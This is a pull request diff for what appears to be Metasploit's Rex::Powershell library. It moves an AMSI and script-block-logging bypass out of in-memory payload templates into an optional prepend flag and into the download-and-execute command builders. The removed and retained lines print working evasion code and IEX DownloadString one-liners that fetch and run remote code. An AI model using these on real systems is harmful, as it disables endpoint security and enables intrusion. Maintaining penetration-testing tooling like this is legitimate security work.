### PR TITLE
Feature cleanup psh bypass pr

### DIFF
--- a/data/templates/to_mem_dotnet.ps1.template
+++ b/data/templates/to_mem_dotnet.ps1.template
@@ -1,22 +1,4 @@
-If($PSVersionTable.PSVersion.Major -ge 3){
-	$GPF=[ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings','N'+'onPublic,Static');
-	If($GPF){
-		$GPC=$GPF.GetValue($null);
-		If($GPC['ScriptB'+'lockLogging']){
-			$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;
-			$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockInvocationLogging']=0
-		}
-		$val=[Collections.Generic.Dictionary[string,System.Object]]::new();
-		$val.Add('EnableScriptB'+'lockLogging',0);
-		$val.Add('EnableScriptB'+'lockInvocationLogging',0);
-		$GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$val
-	} Else {
-		[ScriptBlock].GetField('signatures','N'+'onPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string]))
-	}
-	$Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');
-	$Ref.GetField('amsiIn'+'itFailed','NonPublic,Static').SetValue($null,$true);
-}
-
+Set-StrictMode -Version 2
 $%{var_syscode} = @"
 	using System;
 	using System.Runtime.InteropServices;

--- a/data/templates/to_mem_msil.ps1.template
+++ b/data/templates/to_mem_msil.ps1.template
@@ -1,22 +1,3 @@
-If($PSVersionTable.PSVersion.Major -ge 3){
-	$GPF=[ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings','N'+'onPublic,Static');
-	If($GPF){
-		$GPC=$GPF.GetValue($null);
-		If($GPC['ScriptB'+'lockLogging']){
-			$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;
-			$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockInvocationLogging']=0
-		}
-		$val=[Collections.Generic.Dictionary[string,System.Object]]::new();
-		$val.Add('EnableScriptB'+'lockLogging',0);
-		$val.Add('EnableScriptB'+'lockInvocationLogging',0);
-		$GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$val
-	} Else {
-		[ScriptBlock].GetField('signatures','N'+'onPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string]))
-	}
-	$Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');
-	$Ref.GetField('amsiIn'+'itFailed','NonPublic,Static').SetValue($null,$true);
-}
-
 function %{func_build_dyn_type}($%{var_type_name}){
   $%{var_dyn_asm} = ([AppDomain]::CurrentDomain).DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($%{var_type_name})), [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
   $%{var_dyn_asm}.SetCustomAttribute((New-Object System.Reflection.Emit.CustomAttributeBuilder((New-Object System.Security.AllowPartiallyTrustedCallersAttribute).GetType().GetConstructors()[0], (New-Object System.Object[](0)))))

--- a/data/templates/to_mem_old.ps1.template
+++ b/data/templates/to_mem_old.ps1.template
@@ -1,22 +1,3 @@
-If($PSVersionTable.PSVersion.Major -ge 3){
-	$GPF=[ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings','N'+'onPublic,Static');
-	If($GPF){
-		$GPC=$GPF.GetValue($null);
-		If($GPC['ScriptB'+'lockLogging']){
-			$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;
-			$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockInvocationLogging']=0
-		}
-		$val=[Collections.Generic.Dictionary[string,System.Object]]::new();
-		$val.Add('EnableScriptB'+'lockLogging',0);
-		$val.Add('EnableScriptB'+'lockInvocationLogging',0);
-		$GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$val
-	} Else {
-		[ScriptBlock].GetField('signatures','N'+'onPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string]))
-	}
-	$Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');
-	$Ref.GetField('amsiIn'+'itFailed','NonPublic,Static').SetValue($null,$true);
-}
-
 $%{var_syscode} = @"
 [DllImport("kernel32.dll")]
 public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

--- a/data/templates/to_mem_pshreflection.ps1.template
+++ b/data/templates/to_mem_pshreflection.ps1.template
@@ -1,22 +1,3 @@
-If($PSVersionTable.PSVersion.Major -ge 3){
-	$GPF=[ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings','N'+'onPublic,Static');
-	If($GPF){
-		$GPC=$GPF.GetValue($null);
-		If($GPC['ScriptB'+'lockLogging']){
-			$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;
-			$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockInvocationLogging']=0
-		}
-		$val=[Collections.Generic.Dictionary[string,System.Object]]::new();
-		$val.Add('EnableScriptB'+'lockLogging',0);
-		$val.Add('EnableScriptB'+'lockInvocationLogging',0);
-		$GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$val
-	} Else {
-		[ScriptBlock].GetField('signatures','N'+'onPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string]))
-	}
-	$Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');
-	$Ref.GetField('amsiIn'+'itFailed','NonPublic,Static').SetValue($null,$true);
-}
-
 function %{func_get_proc_address} {
 	Param ($%{var_module}, $%{var_procedure})		
 	$%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')

--- a/lib/rex/powershell/command.rb
+++ b/lib/rex/powershell/command.rb
@@ -316,6 +316,10 @@ EOS
       end
     end
 
+    if opts[:prepend_protections_bypass]
+      psh_payload = Rex::Powershell::PshMethods.bypass_powershell_protections << ";#{psh_payload}"
+    end
+
     compressed_payload = compress_script(psh_payload, nil, opts)
     encoded_payload = encode_script(psh_payload, opts)
 

--- a/lib/rex/powershell/psh_methods.rb
+++ b/lib/rex/powershell/psh_methods.rb
@@ -93,7 +93,7 @@ module Powershell
       %q{
         $Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');
         $Ref.GetField('amsiIn'+'itFailed','NonPublic,Static').SetValue($null,$true);
-      }.gsub(/\s+/, " ").strip
+      }
     end
 
     #
@@ -116,7 +116,7 @@ module Powershell
         } Else {
             [ScriptBlock].GetField('signatures','N'+'onPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string]))
         }
-      }.gsub(/\s+/, " ").strip
+      }
     end
 
     #
@@ -129,7 +129,7 @@ module Powershell
           #{self.bypass_script_log}
           #{self.bypass_amsi}
         }
-      }.gsub(/\s+/, " ").strip
+      }
     end
 
     #
@@ -141,9 +141,9 @@ module Powershell
     # @return [String] PowerShell code to download and exec the url
     def self.download_and_exec_string(url, iex = true)
       if iex
-        %Q^#{self.bypass_powershell_protections}IEX ((new-object Net.WebClient).DownloadString('#{url}'))^
+        %Q^IEX ((new-object Net.WebClient).DownloadString('#{url}'))^
       else
-        %Q^#{self.bypass_powershell_protections}&([scriptblock]::create((new-object Net.WebClient).DownloadString('#{url}')))^
+        %Q^&([scriptblock]::create((new-object Net.WebClient).DownloadString('#{url}')))^
       end
     end
 
@@ -157,8 +157,7 @@ module Powershell
     # @return [String] PowerShell code to download a URL
     def self.proxy_aware_download_and_exec_string(url, iex = true)
       var = Rex::Text.rand_text_alpha(1)
-      cmd = self.bypass_powershell_protections
-      cmd << "$#{var}=new-object net.webclient;"
+      cmd = "$#{var}=new-object net.webclient;"
       cmd << "$#{var}.proxy=[Net.WebRequest]::GetSystemWebProxy();"
       cmd << "$#{var}.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
       if iex


### PR DESCRIPTION
Thanks for the PR.
These changes are designed to thin out the work again to prevent code reuse and leverage the internal composition functions of Rex::Powershell to perform the same work (but leaving things like multi-line gsubs into ";" separated lines to the generator).
Could you please review these changes and consider merging them to your branch?